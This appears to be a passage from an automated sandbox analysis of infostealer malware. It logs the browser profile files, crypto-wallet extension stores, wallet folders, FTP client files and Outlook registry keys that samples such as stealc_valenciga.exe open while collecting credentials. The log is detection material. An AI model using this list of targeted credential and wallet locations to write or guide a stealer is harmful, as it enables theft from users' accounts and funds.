                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                  Tries to harvest and steal ftp login credentials
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                  Tries to steal Crypto Currency Wallets
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                  Tries to steal Mail credentials (via file / registry access)
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
